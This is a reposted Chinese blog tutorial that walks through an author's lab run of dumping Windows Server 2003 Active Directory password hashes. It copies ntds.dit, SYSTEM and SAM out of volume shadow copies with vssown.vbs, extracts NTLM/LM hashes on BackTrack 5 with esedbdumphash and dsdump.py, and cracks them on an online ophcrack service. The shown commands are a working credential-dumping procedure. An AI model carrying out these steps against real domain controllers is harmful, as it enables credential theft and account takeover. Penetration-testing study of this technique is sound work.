离线破win2003域账号密码
2020-12-13 02:29
标签:c style blog a http tar 离线破win2003域账号密码 国内网站讲了许多方法。把我实验成功的经验跟大家分享。
方法是按照tim的文章操作,链接如下: http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
一实验环境:windows
server2003,域环境 搭建方法很简单,百度搜搜。
准备工具:vssown.vbs,bt5,ntds_dump_hash.zip vssown.vbs网上找
http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z
新建一个域用户xiaocai,密码设为 123abcABC
二win2003下提取文件 1、将vssown.vbs拷到域服务器上,比如拷到域服务器的桌面。 2、以管理员身份运行cmd,执行以下命名: cd
桌面 cscript //nologo vssown.vbs /start
启用 cscript //nologo vssown.vbs /status
查看运行状态 cscript //nologo vssown.vbs /create C
创建快照
cscript //nologo vssown.vbs
/list 查看创建的快照信息
这里可以看到系统内部的路径,将两个ntds.dit和SYSTEM文件复制到桌面,这里的[X]用5代替。 copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit
copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM
copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM
提取就文件就结束了。这里尝试的时候经常失败。有空再找找资料到底是什么造成。
再把快照删除(这步可选,建议删除掉)
cscript //nologo vssown.vbs
/delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D} 把这3个生成的文件复制出来。
三提取HASH
先下载工具,BT5,我是用下面这个虚拟机镜相 VMWARE镜像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z 默认登陆密码:root/toor 开放ssh服务:(开启服务后可以用Secure CRT进行访问,方便传文件) ssh-keygen -t rsa -f
/etc/ssh/ssh_host_rsa_key ssh-keygen -t dsa -f
/etc/ssh/ssh_host_dsa_key sshd-generate /etc/init.d/ssh restart
略掉一个截图
用ifconfig查看IP
接着用Secure
CRT访问,
按ALT+P
开启SFTP,把文件传到/tmp下 cd /tmp put SYSTEM ntds.dit
ntds_dump_hash.zip
切换到BT5系统标签 cd /tmp ls
#解压 ntds_dump_hash.zip unzip ntds_dump_hash.zip
#编译libesedb cd libesedb
chmod +x
configure ./configure
&& make #解释数据文件ntds.dit cd esedbtools
./esedbdumphash
../../ntds.dit #提取hash cd
../../creddump/ python
./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable
提取出来了,找到,
xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::
四破解hash
破解hash方法很多,这里采用网站破解。把加粗的那部分放到网站上去破解:http://www.objectif-securite.ch/en/ophcrack.php
离线破win2003域账号密码,搜素材,soscw.com 离线破win2003域账号密码 标签:c style blog a http tar 原文地址:http://www.cnblogs.com/pentesterlab-beginner/p/3769093.html